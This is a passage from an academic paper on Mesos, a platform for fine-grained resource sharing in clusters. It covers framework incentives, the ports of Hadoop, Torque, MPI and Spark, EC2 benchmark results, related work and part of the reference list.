Incentives\nMesos implements a decentralized scheduling model,\nwhere each framework decides which offers to accept.\nAs with any decentralized system, it is important to un-\nderstand the incentives of entities in the system. In this\nsection, we discuss the incentives of frameworks (and\ntheir users) to improve the response times of their jobs.\nShort tasks: A framework is incentivized to use short\ntasks for two reasons. First, it will be able to allocate any\nresources reserved for short slots. Second, using small\ntasks minimizes the wasted work if the framework loses\na task, either due to revocation or simply due to failures.\nScale elastically: The ability of a framework to use re-\nsources as soon as it acquires them–instead of waiting\nto reach a given minimum allocation–would allow the\nframework to start (and complete) its jobs earlier. In ad-\ndition, the ability to scale up and down allows a frame-\nwork to grab unused resources opportunistically, as it can\nlater release them with little negative impact.\nDo not accept unknown resources: Frameworks are\nincentivized not to accept resources that they cannot use\nbecause most allocation policies will count all the re-\nsources that a framework owns when making offers.\nWe note that these incentives align well with our goal\nof improving utilization. If frameworks use short tasks,\nMesos can reallocate resources quickly between them,reducing latency for new jobs and wasted work for revo-\ncation. If frameworks are elastic, they will opportunis-\ntically utilize all the resources they can obtain. Finally,\nif frameworks do not accept resources that they do not\nunderstand, they will leave them for frameworks that do.\nWe also note that these properties are met by many\ncurrent cluster computing frameworks, such as MapRe-\nduce and Dryad, simply because using short independent\ntasks simplifies load balancing and fault recovery.\n4.6 Limitations of Distributed Scheduling\nAlthough we have shown that distributed scheduling\nworks well in a range of workloads relevant to current\ncluster environments, like any decentralized approach, it\ncan perform worse than a centralized scheduler. We have\nidentified three limitations of the distributed model:\nFragmentation: When tasks have heterogeneous re-\nsource demands, a distributed collection of frameworks\nmay not be able to optimize bin packing as well as a cen-\ntralized scheduler. However, note that the wasted space\ndue to suboptimal bin packing is bounded by the ratio be-\ntween the largest task size and the node size. Therefore,\nclusters running “larger” nodes (e.g., multicore nodes)\nand “smaller” tasks within those nodes will achieve high\nutilization even with distributed scheduling.\nThere is another possible bad outcome if allocation\nmodules reallocate resources in a na ¨ıve manner: when\na cluster is filled by tasks with small resource require-\nments, a framework fwith large resource requirements\nmay starve, because whenever a small task finishes, f\ncannot accept the resources freed by it, but other frame-\nworks can. To accommodate frameworks with large per-\ntask resource requirements, allocation modules can sup-\nport a minimum offer size on each slave, and abstain from\noffering resources on the slave until this amount is free.\nInterdependent framework constraints: It is possi-\nble to construct scenarios where, because of esoteric in-\nterdependencies between frameworks ( e.g., certain tasks\nfrom two frameworks cannot be colocated), only a sin-\ngle global allocation of the cluster performs well. We\nargue such scenarios are rare in practice. In the model\ndiscussed in this section, where frameworks only have\npreferences over which nodes they use, we showed that\nallocations approximate those of optimal schedulers.\nFramework complexity: Using resource offers may\nmake framework scheduling more complex. We argue,\nhowever, that this difficulty is not onerous. First, whether\nusing Mesos or a centralized scheduler, frameworks need\nto know their preferences; in a centralized scheduler,\nthe framework needs to express them to the scheduler,\nwhereas in Mesos, it must use them to decide which of-\nfers to accept. Second, many scheduling policies for ex-\nisting frameworks are online algorithms, because frame-\n7works cannot predict task times and must be able to han-\ndle failures and stragglers [18, 40, 38]. These policies\nare easy to implement over resource offers.\n5 Implementation\nWe have implemented Mesos in about 10,000 lines of\nC++. The system runs on Linux, Solaris and OS X, and\nsupports frameworks written in C++, Java, and Python.\nTo reduce the complexity of our implementation, we\nuse a C++ library called libprocess [7] that provides\nan actor-based programming model using efficient asyn-\nchronous I/O mechanisms ( epoll ,kqueue , etc). We\nalso use ZooKeeper [4] to perform leader election.\nMesos can use Linux containers [9] or Solaris projects\n[13] to isolate tasks. We currently isolate CPU cores and\nmemory. We plan to leverage recently added support for\nnetwork and I/O isolation in Linux [8] in the future.\nWe have implemented four frameworks on top of\nMesos. First, we have ported three existing cluster com-\nputing systems: Hadoop [2], the Torque resource sched-\nuler [33], and the MPICH2 implementation of MPI [16].\nNone of these ports required changing these frameworks’\nAPIs, so all of them can run unmodified user programs.\nIn addition, we built a specialized framework for iterative\njobs called Spark, which we discuss in Section 5.3.\n5.1 Hadoop Port\nPorting Hadoop to run on Mesos required relatively few\nmodifications, because Hadoop’s fine-grained map and\nreduce tasks map cleanly to Mesos tasks. In addition, the\nHadoop master, known as the JobTracker, and Hadoop\nslaves, known as TaskTrackers, fit naturally into the\nMesos model as a framework scheduler and executor.\nTo add support for running Hadoop on Mesos, we took\nadvantage of the fact that Hadoop already has a plug-\ngable API for writing job schedulers. We wrote a Hadoop\nscheduler that connects to Mesos, launches TaskTrackers\nas its executors, and maps each Hadoop task to a Mesos\ntask. When there are unlaunched tasks in Hadoop, our\nscheduler first starts Mesos tasks on the nodes of the\ncluster that it wants to use, and then sends the Hadoop\ntasks to them using Hadoop’s existing internal interfaces.\nWhen tasks finish, our executor notifies Mesos by listen-\ning for task finish events using an API in the TaskTracker.\nWe used delay scheduling [38] to achieve data locality\nby waiting for slots on the nodes that contain task in-\nput data. In addition, our approach allowed us to reuse\nHadoop’s existing logic for re-scheduling of failed tasks\nand for speculative execution (straggler mitigation).\nWe also needed to change how map output data is\nserved to reduce tasks. Hadoop normally writes map\noutput files to the local filesystem, then serves these to\nreduce tasks using an HTTP server included in the Task-\nTracker. However, the TaskTracker within Mesos runsas an executor, which may be terminated if it is not run-\nning tasks. This would make map output files unavailable\nto reduce tasks. We solved this problem by providing a\nshared file server on each node in the cluster to serve\nlocal files. Such a service is useful beyond Hadoop, to\nother frameworks that write data locally on each node.\nIn total, our Hadoop port is 1500 lines of code.\n5.2 Torque and MPI Ports\nWe have ported the Torque cluster resource manager to\nrun as a framework on Mesos. The framework consists\nof a Mesos scheduler and executor, written in 360 lines\nof Python code, that launch and manage different com-\nponents of Torque. In addition, we modified 3 lines of\nTorque source code to allow it to elastically scale up and\ndown on Mesos depending on the jobs in its queue.\nAfter registering with the Mesos master, the frame-\nwork scheduler configures and launches a Torque server\nand then periodically monitors the server’s job queue.\nWhile the queue is empty, the scheduler releases all tasks\n(down to an optional minimum, which we set to 0) and\nrefuses all resource offers it receives from Mesos. Once\na job gets added to Torque’s queue (using the standard\nqsub command), the scheduler begins accepting new\nresource offers. As long as there are jobs in Torque’s\nqueue, the scheduler accepts offers as necessary to sat-\nisfy the constraints of as many jobs in the queue as pos-\nsible. On each node where offers are accepted, Mesos\nlaunches our executor, which in turn starts a Torque\nbackend daemon and registers it with the Torque server.\nWhen enough Torque backend daemons have registered,\nthe torque server will launch the next job in its queue.\nBecause jobs that run on Torque (e.g. MPI) may not be\nfault tolerant, Torque avoids having its tasks revoked by\nnot accepting resources beyond its guaranteed allocation.\nIn addition to the Torque framework, we also created\na Mesos MPI “wrapper” framework, written in 200 lines\nof Python code, for running MPI jobs directly on Mesos.\n5.3 Spark Framework\nMesos enables the creation of specialized frameworks\noptimized for workloads for which more general exe-\ncution layers may not be optimal. To test the hypoth-\nesis that simple specialized frameworks provide value,\nwe identified one class of jobs that were found to per-\nform poorly on Hadoop by machine learning researchers\nat our lab: iterative jobs , where a dataset is reused across\na number of iterations. We built a specialized framework\ncalled Spark [39] optimized for these workloads.\nOne example of an iterative algorithm used in ma-\nchine learning is logistic regression [22]. This algorithm\nseeks to find a line that separates two sets of labeled data\npoints. The algorithm starts with a random line w. Then,\non each iteration, it computes the gradient of an objective\n8. . . w f(x,w) w f(x,w) x x a) Dryad b) Spark w f(x,w) x Figure 4: Data flow of a logistic regression job in Dryad\nvs. Spark. Solid lines show data flow within the framework.\nDashed lines show reads from a distributed file system. Spark\nreuses in-memory data across iterations to improve efficiency.\nfunction that measures how well the line separates the\npoints, and shifts walong this gradient. This gradient\ncomputation amounts to evaluating a function f(x;w)\nover each data point xand summing the results. An\nimplementation of logistic regression in Hadoop must\nrun each iteration as a separate MapReduce job, because\neach iteration depends on the wcomputed at the previous\none. This imposes overhead because every iteration must\nre-read the input file into memory. In Dryad, the whole\njob can be expressed as a data flow DAG as shown in Fig-\nure 4a, but the data must still must be reloaded from disk\nat each iteration. Reusing the data in memory between\niterations in Dryad would require cyclic data flow.\nSpark’s execution is shown in Figure 4b. Spark uses\nthe long-lived nature of Mesos executors to cache a slice\nof the dataset in memory at each executor, and then run\nmultiple iterations on this cached data. This caching is\nachieved in a fault-tolerant manner: if a node is lost,\nSpark remembers how to recompute its slice of the data.\nBy building Spark on top of Mesos, we were able to\nkeep its implementation small (about 1300 lines of code),\nyet still capable of outperforming Hadoop by 10\u0002for\niterative jobs. In particular, using Mesos’s API saved us\nthe time to write a master daemon, slave daemon, and\ncommunication protocols between them for Spark. The\nmain pieces we had to write were a framework scheduler\n(which uses delay scheduling for locality) and user APIs.\n6 Evaluation\nWe evaluated Mesos through a series of experiments on\nthe Amazon Elastic Compute Cloud (EC2). We begin\nwith a macrobenchmark that evaluates how the system\nshares resources between four workloads, and go on to\npresent a series of smaller experiments designed to eval-\nuate overhead, decentralized scheduling, our specialized\nframework (Spark), scalability, and failure recovery.\n6.1 Macrobenchmark\nTo evaluate the primary goal of Mesos, which is enabling\ndiverse frameworks to efficiently share a cluster, we ran aBin Job Type Map Tasks Reduce Tasks # Jobs Run\n1 selection 1 NA 38\n2 text search 2 NA 18\n3 aggregation 10 2 14\n4 selection 50 NA 12\n5 aggregation 100 10 6\n6 selection 200 NA 6\n7 text search 400 NA 4\n8 join 400 30 2\nTable 3: Job types for each bin in our Facebook Hadoop mix.\nmacrobenchmark consisting of a mix of four workloads:\n\u000fA Hadoop instance running a mix of small and large\njobs based on the workload at Facebook.\n\u000fA Hadoop instance running a set of large batch jobs.\n\u000fSpark running a series of machine learning jobs.\n\u000fTorque running a series of MPI jobs.\nWe compared a scenario where the workloads ran as\nfour frameworks on a 96-node Mesos cluster using fair\nsharing to a scenario where they were each given a static\npartition of the cluster (24 nodes), and measured job re-\nsponse times and resource utilization in both cases. We\nused EC2 nodes with 4 CPU cores and 15 GB of RAM.\nWe begin by describing the four workloads in more\ndetail, and then present our results.\n6.1.1 Macrobenchmark Workloads\nFacebook Hadoop Mix Our Hadoop job mix was\nbased on the distribution of job sizes and inter-arrival\ntimes at Facebook, reported in [38]. The workload con-\nsists of 100 jobs submitted at fixed times over a 25-\nminute period, with a mean inter-arrival time of 14s.\nMost of the jobs are small (1-12 tasks), but there are also\nlarge jobs of up to 400 tasks.4The jobs themselves were\nfrom the Hive benchmark [6], which contains four types\nof queries: text search, a simple selection, an aggrega-\ntion, and a join that gets translated into multiple MapRe-\nduce steps. We grouped the jobs into eight bins of job\ntype and size (listed in Table 3) so that we could com-\npare performance in each bin. We also set the framework\nscheduler to perform fair sharing between its jobs, as this\npolicy is used at Facebook.\nLarge Hadoop Mix To emulate batch workloads that\nneed to run continuously, such as web crawling, we had\na second instance of Hadoop run a series of IO-intensive\n2400-task text search jobs. A script launched ten of these\njobs, submitting each one after the previous one finished.\nSpark We ran five instances of an iterative machine\nlearning job on Spark. These were launched by a script\nthat waited 2 minutes after each job ended to submit\nthe next. The job we used was alternating least squares\n4We scaled down the largest jobs in [38] to have the workload fit a\nquarter of our cluster size.\n9 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200 1400 1600Share of Cluster\nTime (s)(a) Facebook Hadoop Mix\nStatic Partitioning\nMesos\n 0 0.2 0.4 0.6 0.8 1\n 0 500 1000 1500 2000 2500 3000Share of Cluster\nTime (s)(b) Large Hadoop Mix\nStatic Partitioning\nMesos\n 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200 1400 1600 1800Share of Cluster\nTime (s)(c) Spark\nStatic Partitioning\nMesos\n 0 0.2 0.4 0.6 0.8 1\n 0 200 400 600 800 1000 1200 1400 1600Share of Cluster\nTime (s)(d) Torque / MPI\nStatic Partitioning\nMesosFigure 5: Comparison of cluster shares (fraction of CPUs) over time for each of the frameworks in the Mesos and static partitioning\nmacrobenchmark scenarios. On Mesos, frameworks can scale up when their demand is high and that of other frameworks is low, and\nthus finish jobs faster. Note that the plots’ time axes are different ( e.g., the large Hadoop mix takes 3200s with static partitioning).\nFigure 6: Framework shares on Mesos during the macrobench-\nmark. By pooling resources, Mesos lets each workload scale\nup to fill gaps in the demand of others. In addition, fine-grained\nsharing allows resources to be reallocated in tens of seconds.\n(ALS), a collaborative filtering algorithm [42]. This job\nis CPU-intensive but also benefits from caching its input\ndata on each node, and needs to broadcast updated pa-\nrameters to all nodes running its tasks on each iteration.\nTorque / MPI Our Torque framework ran eight in-\nstances of the tachyon raytracing job [35] that is part of\nthe SPEC MPI2007 benchmark. Six of the jobs ran small\nproblem sizes and two ran large ones. Both types used 24\nparallel tasks. We submitted these jobs at fixed times to\nboth clusters. The tachyon job is CPU-intensive.\n6.1.2 Macrobenchmark Results\nA successful result for Mesos would show two things:\nthat Mesos achieves higher utilization than static parti-\ntioning, and that jobs finish at least as fast in the shared\ncluster as they do in their static partition, and possibly\nfaster due to gaps in the demand of other frameworks.\nOur results show both effects, as detailed below.\nWe show the fraction of CPU cores allocated to each\n 0 20 40 60 80 100 0 200 400 600 800 1000 1200 1400 1600CPU Utilization (%)Time (s)MesosStatic\n 0 10 20 30 40 50 0 200 400 600 800 1000 1200 1400 1600Memory Utilization (%)Time (s)MesosStaticFigure 7: Average CPU and memory utilization over time\nacross all nodes in the Mesos cluster vs. static partitioning.\nframework by Mesos over time in Figure 6. We see that\nMesos enables each framework to scale up during peri-\nods when other frameworks have low demands, and thus\nkeeps cluster nodes busier. For example, at time 350,\nwhen both Spark and the Facebook Hadoop framework\nhave no running jobs and Torque is using 1/8 of the clus-\nter, the large-job Hadoop framework scales up to 7/8 of\nthe cluster. In addition, we see that resources are reallo-\ncated rapidly ( e.g., when a Facebook Hadoop job starts\naround time 360) due to the fine-grained nature of tasks.\nFinally, higher allocation of nodes also translates into in-\ncreased CPU and memory utilization (by 10% for CPU\nand 17% for memory), as shown in Figure 7.\nA second question is how much better jobs perform\nunder Mesos than when using a statically partitioned\ncluster. We present this data in two ways. First, Fig-\nure 5 compares the resource allocation over time of\neach framework in the shared and statically partitioned\nclusters. Shaded areas show the allocation in the stat-\n10Framework Sum of Exec Times w/Static Partitioning (s) Sum of Exec Times with Mesos (s) Speedup Facebook Hadoop Mix 7235 6319 1.14 Large Hadoop Mix 3143 1494 2.10 Spark 1684 1338 1.26 Torque / MPI 3210 3352 0.96 Table 4: Aggregate performance of each framework in the mac-\nrobenchmark (sum of running times of all the jobs in the frame-\nwork). The speedup column shows the relative gain on Mesos.\nically partitioned cluster, while solid lines show the\nshare on Mesos. We see that the fine-grained frame-\nworks (Hadoop and Spark) take advantage of Mesos to\nscale up beyond 1/4 of the cluster when global demand\nallows this, and consequently finish bursts of submit-\nted jobs faster in Mesos. At the same time, Torque\nachieves roughly similar allocations and job durations\nunder Mesos (with some differences explained later).\nSecond, Tables 4 and 5 show a breakdown of job per-\nformance for each framework. In Table 4, we compare\nthe aggregate performance of each framework, defined\nas the sum of job running times, in the static partitioning\nand Mesos scenarios. We see the Hadoop and Spark jobs\nas a whole are finishing faster on Mesos, while Torque is\nslightly slower. The framework that gains the most is the\nlarge-job Hadoop mix, which almost always has tasks to\nrun and fills in the gaps in demand of the other frame-\nworks; this framework performs 2x better on Mesos.\nTable 5 breaks down the results further by job type.\nWe observe two notable trends. First, in the Facebook\nHadoop mix, the smaller jobs perform worse on Mesos.\nThis is due to an interaction between the fair sharing per-\nformed by Hadoop (among its jobs) and the fair sharing\nin Mesos (among frameworks): During periods of time\nwhen Hadoop has more than 1/4 of the cluster, if any jobs\nare submitted to the other frameworks, there is a delay\nbefore Hadoop gets a new resource offer (because any\nfreed up resources go to the framework farthest below its\nshare), so any small job submitted during this time is de-\nlayed for a long time relative to its length. In contrast,\nwhen running alone, Hadoop can assign resources to the\nnew job as soon as any of its tasks finishes. This prob-\nlem with hierarchical fair sharing is also seen in networks\n[34], and could be mitigated by running the small jobs on\na separate framework or using a different allocation pol-\nicy (e.g., using lottery scheduling instead of offering all\nfreed resources to the framework with the lowest share).\nLastly, Torque is the only framework that performed\nworse, on average, on Mesos. The large tachyon jobs\ntook on average 2 minutes longer, while the small ones\ntook 20s longer. Some of this delay is due to Torque hav-\ning to wait to launch 24 tasks on Mesos before starting\neach job, but the average time this takes is 12s. We be-\nFramework Job Type Exec Time w/ Static Partitioning (s) Avg. Speedup on Mesos Facebook Hadoop Mix selection (1) 24 0.84 text search (2) 31 0.90 aggregation (3) 82 0.94 selection (4) 65 1.40 aggregation (5) 192 1.26 selection (6) 136 1.71 text search (7) 137 2.14 join (8) 662 1.35 Large Hadoop Mix text search 314 2.21 Spark ALS 337 1.36 Torque / MPI small tachyon 261 0.91 large tachyon 822 0.88 Table 5: Performance of each job type in the macrobenchmark.\nBins for the Facebook Hadoop mix are in parentheses.\n0 120 240 360 480 600 0% 20% 40% 60% 80% 100% \nStatic partitioning Mesos, no delay sched. Mesos, 1s delay sched. Mesos, 5s delay sched. \nJob Running TIme (s) Local Map Tasks (%) Data Locality Job Running Times \nFigure 8: Data locality and average job durations for 16\nHadoop instances running on a 93-node cluster using static par-\ntitioning, Mesos, or Mesos with delay scheduling.\nlieve that the rest of the delay is due to stragglers (slow\nnodes). In our standalone Torque run, we saw two jobs\ntake about 60s longer to run than the others (Fig. 5d). We\ndiscovered that both of these jobs were using a node that\nperformed slower on single-node benchmarks than the\nothers (in fact, Linux reported 40% lower bogomips on\nit). Because tachyon hands out equal amounts of work\nto each node, it runs as slowly as the slowest node.\n6.2 Overhead\nTo measure the overhead Mesos imposes when a single\nframework uses the cluster, we ran two benchmarks us-\ning MPI and Hadoop on an EC2 cluster with 50 nodes,\neach with 2 CPU cores and 6.5 GB RAM. We used the\nHigh-Performance LINPACK [15] benchmark for MPI\nand a WordCount job for Hadoop, and ran each job three\ntimes. The MPI job took on average 50.9s without Mesos\nand 51.8s with Mesos, while the Hadoop job took 160s\nwithout Mesos and 166s with Mesos. In both cases, the\noverhead of using Mesos was less than 4%.\n6.3 Data Locality through Delay Scheduling\nIn this experiment, we evaluated how Mesos’ resource\noffer mechanism enables frameworks to control their\ntasks’ placement, and in particular, data locality. We\nran 16 instances of Hadoop using 93 EC2 nodes, each\nwith 4 CPU cores and 15 GB RAM. Each node ran a\n11map-only scan job that searched a 100 GB file spread\nthroughout the cluster on a shared HDFS file system and\noutputted 1% of the records. We tested four scenarios:\ngiving each Hadoop instance its own 5-6 node static par-\ntition of the cluster (to emulate organizations that use\ncoarse-grained cluster sharing systems), and running all\ninstances on Mesos using either no delay scheduling, 1s\ndelay scheduling or 5s delay scheduling.\nFigure 8 shows averaged measurements from the 16\nHadoop instances across three runs of each scenario. Us-\ning static partitioning yields very low data locality (18%)\nbecause the Hadoop instances are forced to fetch data\nfrom nodes outside their partition. In contrast, running\nthe Hadoop instances on Mesos improves data locality,\neven without delay scheduling, because each Hadoop in-\nstance has tasks on more nodes of the cluster (there are\n4 tasks per node), and can therefore access more blocks\nlocally. Adding a 1-second delay brings locality above\n90%, and a 5-second delay achieves 95% locality, which\nis competitive with running one Hadoop instance alone\non the whole cluster. As expected, job performance im-\nproves with data locality: jobs run 1.7x faster in the 5s\ndelay scenario than with static partitioning.\n6.4 Spark Framework\nWe evaluated the benefit of running iterative jobs using\nthe specialized Spark framework we developed on top\nof Mesos (Section 5.3) over the general-purpose Hadoop\nframework. We used a logistic regression job imple-\nmented in Hadoop by machine learning researchers in\nour lab, and wrote a second version of the job using\nSpark. We ran each version separately on 20 EC2 nodes,\neach with 4 CPU cores and 15 GB RAM. Each exper-\niment used a 29 GB data file and varied the number of\nlogistic regression iterations from 1 to 30 (see Figure 9).\nWith Hadoop, each iteration takes 127s on average,\nbecause it runs as a separate MapReduce job. In contrast,\nwith Spark, the first iteration takes 174s, but subsequent\niterations only take about 6 seconds, leading to a speedup\nof up to 10x for 30 iterations. This happens because the\ncost of reading the data from disk and parsing it is much\nhigher than the cost of evaluating the gradient function\ncomputed by the job on each iteration. Hadoop incurs the\nread/parsing cost on each iteration, while Spark reuses\ncached blocks of parsed data and only incurs this cost\nonce. The longer time for the first iteration in Spark is\ndue to the use of slower text parsing routines.\n6.5 Mesos Scalability\nTo evaluate Mesos’ scalability, we emulated large clus-\nters by running up to 50,000 slave daemons on 99 Ama-\nzon EC2 nodes, each with 8 CPU cores and 6 GB RAM.\nWe used one EC2 node for the master and the rest of the\nnodes to run slaves. During the experiment, each of 200\n0 1000 2000 3000 4000 0 10 20 30 Running Time (s) Number of Iterations Hadoop Spark Figure 9: Hadoop and Spark logistic regression running times.\n0 0.25 0.5 0.75 1 0 10000 20000 30000 40000 50000 Task Launch Overhead (seconds) Number of Nodes \nFigure 10: Mesos master’s scalability versus number of slaves.\nframeworks running throughout the cluster continuously\nlaunches tasks, starting one task on each slave that it re-\nceives a resource offer for. Each task sleeps for a period\nof time based on a normal distribution with a mean of\n30 seconds and standard deviation of 10s, and then ends.\nEach slave runs up to two tasks at a time.\nOnce the cluster reached steady-state (i.e., the 200\nframeworks achieve their fair shares and all resources\nwere allocated), we launched a test framework that runs a\nsingle 10 second task and measured how long this frame-\nwork took to finish. This allowed us to calculate the extra\ndelay incurred over 10s due to having to register with the\nmaster, wait for a resource offer, accept it, wait for the\nmaster to process the response and launch the task on a\nslave, and wait for Mesos to report the task as finished.\nWe plot this extra delay in Figure 10, showing aver-\nages of 5 runs. We observe that the overhead remains\nsmall (less than one second) even at 50,000 nodes. In\nparticular, this overhead is much smaller than the aver-\nage task and job lengths in data center workloads (see\nSection 2). Because Mesos was also keeping the clus-\nter fully allocated, this indicates that the master kept up\nwith the load placed on it. Unfortunately, the EC2 vir-\ntualized environment limited scalability beyond 50,000\nslaves, because at 50,000 slaves the master was process-\ning 100,000 packets per second (in+out), which has been\nshown to be the current achievable limit on EC2 [12].\n6.6 Failure Recovery\nTo evaluate recovery from master failures, we conducted\nan experiment with 200 to 4000 slave daemons on 62\nEC2 nodes with 4 cores and 15 GB RAM. We ran 200\nframeworks that each launched 20-second tasks, and two\nMesos masters connected to a 5-node ZooKeeper quo-\nrum.We synchronized the two masters’ clocks using NTP\n12and measured the mean time to recovery (MTTR) after\nkilling the active master. The MTTR is the time for all of\nthe slaves and frameworks to connect to the second mas-\nter. In all cases, the MTTR was between 4 and 8 seconds,\nwith 95% confidence intervals of up to 3s on either side.\n6.7 Performance Isolation\nAs discussed in Section 3.4, Mesos leverages existing\nOS isolation mechanism to provide performance isola-\ntion between different frameworks’ tasks running on the\nsame slave. While these mechanisms are not perfect,\na preliminary evaluation of Linux Containers [9] shows\npromising results. In particular, using Containers to iso-\nlate CPU usage between a MediaWiki web server (con-\nsisting of multiple Apache processes running PHP) and a\n“hog” application (consisting of 256 processes spinning\nin infinite loops) shows on average only a 30% increase\nin request latency for Apache versus a 550% increase\nwhen running without Containers. We refer the reader to\n[29] for a fuller evaluation of OS isolation mechanisms.\n7 Related Work\nHPC and Grid Schedulers. The high performance\ncomputing (HPC) community has long been managing\nclusters [33, 41]. However, their target environment typ-\nically consists of specialized hardware, such as Infini-\nband and SANs, where jobs do not need to be scheduled\nlocal to their data. Furthermore, each job is tightly cou-\npled, often using barriers or message passing. Thus, each\njob is monolithic, rather than composed of fine-grained\ntasks, and does not change its resource demands during\nits lifetime. For these reasons, HPC schedulers use cen-\ntralized scheduling, and require users to declare the re-\nquired resources at job submission time. Jobs are then\ngiven coarse-grained allocations of the cluster. Unlike\nthe Mesos approach, this does not allow jobs to locally\naccess data distributed across the cluster. Furthermore,\njobs cannot grow and shrink dynamically. In contrast,\nMesos supports fine-grained sharing at the level of tasks\nand allows frameworks to control their placement.\nGrid computing has mostly focused on the problem\nof making diverse virtual organizations share geograph-\nically distributed and separately administered resources\nin a secure and interoperable way. Mesos could well be\nused within a virtual organization inside a larger grid.\nPublic and Private Clouds. Virtual machine clouds\nsuch as Amazon EC2 [1] and Eucalyptus [31] share\ncommon goals with Mesos, such as isolating applica-\ntions while providing a low-level abstraction (VMs).\nHowever, they differ from Mesos in several important\nways. First, their relatively coarse grained VM allocation\nmodel leads to less efficient resource utilization and data\nsharing than in Mesos. Second, these systems generally\ndo not let applications specify placement needs beyondthe size of VM they require. In contrast, Mesos allows\nframeworks to be highly selective about task placement.\nQuincy. Quincy [25] is a fair scheduler for Dryad\nthat uses a centralized scheduling algorithm for Dryad’s\nDAG-based programming model. In contrast, Mesos\nprovides the lower-level abstraction of resource offers to\nsupport multiple cluster computing frameworks.\nCondor. The Condor cluster manager uses the Class-\nAds language [32] to match nodes to jobs. Using a re-\nsource specification language is not as flexible for frame-\nworks as resource offers, since not all requirements may\nbe expressible. Also, porting existing frameworks, which\nhave their own schedulers, to Condor would be more dif-\nficult than porting them to Mesos, where existing sched-\nulers fit naturally into the two-level scheduling model.\nNext-Generation Hadoop. Recently, Yahoo! an-\nnounced a redesign for Hadoop that uses a two-level\nscheduling model, where per-application masters request\nresources from a central manager [14]. The design aims\nto support non-MapReduce applications as well. While\ndetails about the scheduling model in this system are cur-\nrently unavailable, we believe that the new application\nmasters could naturally run as Mesos frameworks.\n8 Conclusion and Future Work\nWe have presented Mesos, a thin management layer that\nallows diverse cluster computing frameworks to effi-\nciently share resources. Mesos is built around two de-\nsign elements: a fine-grained sharing model at the level\nof tasks, and a distributed scheduling mechanism called\nresource offers that delegates scheduling decisions to the\nframeworks. Together, these elements let Mesos achieve\nhigh utilization, respond quickly to workload changes,\nand cater to diverse frameworks while remaining scalable\nand robust. We have shown that existing frameworks\ncan effectively share resources using Mesos, that Mesos\nenables the development of specialized frameworks pro-\nviding major performance gains, such as Spark, and that\nMesos’s simple design allows the system to be fault tol-\nerant and to scale to 50,000 nodes.\nIn future work, we plan to further analyze the re-\nsource offer model and determine whether any exten-\nsions can improve its efficiency while retaining its flex-\nibility. In particular, it may be possible to have frame-\nworks give richer hints about offers they would like to\nreceive. Nonetheless, we believe that below any hint\nsystem, frameworks should still have the ability to re-\nject offers and to choose which tasks to launch on each\nresource, so that their evolution is not constrained by the\nhint language provided by the system.\nWe are also currently using Mesos to manage re-\nsources on a 40-node cluster in our lab and in a test de-\nployment at Twitter, and plan to report on lessons from\n13these deployments in future work.\n9 Acknowledgements\nWe thank our industry colleagues at Google, Twitter,\nFacebook, Yahoo! and Cloudera for their valuable feed-\nback on Mesos. This research was supported by Califor-\nnia MICRO, California Discovery, the Natural Sciences\nand Engineering Research Council of Canada, a National\nScience Foundation Graduate Research Fellowship,5the\nSwedish Research Council, and the following Berkeley\nRAD Lab sponsors: Google, Microsoft, Oracle, Ama-\nzon, Cisco, Cloudera, eBay, Facebook, Fujitsu, HP, Intel,\nNetApp, SAP, VMware, and Yahoo!.\nReferences\n[1] Amazon EC2. http://aws.amazon.com/ec2 .\n[2] Apache Hadoop. http://hadoop.apache.org .\n[3] Apache Hive. http://hadoop.apache.org/hive .\n[4] Apache ZooKeeper. hadoop.apache.org/zookeeper .\n[5] Hive – A Petabyte Scale Data Warehouse using Hadoop.\nhttp://www.facebook.com/note.php?note_id=\n89508453919 .\n[6] Hive performance benchmarks. http:\n//issues.apache.org/jira/browse/HIVE-396 .\n[7] LibProcess Homepage. http:\n//www.eecs.berkeley.edu/ ˜benh/libprocess .\n[8] Linux 2.6.33 release notes.\nhttp://kernelnewbies.org/Linux_2_6_33 .\n[9] Linux containers (LXC) overview document.\nhttp://lxc.sourceforge.net/lxc.html .\n[10] Personal communication with Dhruba Borthakur from Facebook.\n[11] Personal communication with Owen O’Malley and Arun C.\nMurthy from the Yahoo! Hadoop team.\n[12] RightScale blog. blog.rightscale.com/2010/04/01/\nbenchmarking-load-balancers-in-the-cloud .\n[13] Solaris Resource Management.\nhttp://docs.sun.com/app/docs/doc/817-1592 .\n[14] The Next Generation of Apache Hadoop MapReduce.\nhttp://developer.yahoo.com/blogs/hadoop/\nposts/2011/02/mapreduce-nextgen .\n[15] E. Anderson, Z. Bai, J. Dongarra, A. Greenbaum, A. McKenney,\nJ. Du Croz, S. Hammerling, J. Demmel, C. Bischof, and\nD. Sorensen. LAPACK: a portable linear algebra library for\nhigh-performance computers. In Supercomputing ’90 , 1990.\n[16] A. Bouteiller, F. Cappello, T. Herault, G. Krawezik,\nP. Lemarinier, and F. Magniette. Mpich-v2: a fault tolerant MPI\nfor volatile nodes based on pessimistic sender based message\nlogging. In Supercomputing ’03 , 2003.\n[17] T. Condie, N. Conway, P. Alvaro, and J. M. Hellerstein.\nMapReduce online. In NSDI ’10 , May 2010.\n[18] J. Dean and S. Ghemawat. MapReduce: Simplified data\nprocessing on large clusters. In OSDI , pages 137–150, 2004.\n[19] J. Ekanayake, H. Li, B. Zhang, T. Gunarathne, S.-H. Bae, J. Qiu,\nand G. Fox. Twister: a runtime for iterative mapreduce. In Proc.\nHPDC ’10 , 2010.\n[20] D. R. Engler, M. F. Kaashoek, and J. O’Toole. Exokernel: An\noperating system architecture for application-level resource\nmanagement. In SOSP , pages 251–266, 1995.\n[21] A. Ghodsi, M. Zaharia, B. Hindman, A. Konwinski, S. Shenker,\nand I. Stoica. Dominant resource fairness: fair allocation of\nmultiple resource types. In NSDI , 2011.\n5Any opinions, findings, conclusions, or recommendations ex-\npressed in this publication are those of the authors and do not nec-\nessarily reflect the views of the NSF.[22] T. Hastie, R. Tibshirani, and J. Friedman. The Elements of\nStatistical Learning: Data Mining, Inference, and Prediction .\nSpringer Publishing Company, New York, NY , 2009.\n[23] B. Hindman, A. Konwinski, M. Zaharia, A. Ghodsi, A. D.\nJoseph, R. H. Katz, S. Shenker, and I. Stoica. Mesos: A platform\nfor fine-grained resource sharing in the data center. Technical\nReport UCB/EECS-2010-87, UC Berkeley, May 2010.\n[24] M. Isard, M. Budiu, Y . Yu, A. Birrell, and D. Fetterly. Dryad:\ndistributed data-parallel programs from sequential building\nblocks. In EuroSys 07 , 2007.\n[25] M. Isard, V . Prabhakaran, J. Currey, U. Wieder, K. Talwar, and\nA. Goldberg. Quincy: Fair scheduling for distributed computing\nclusters. In 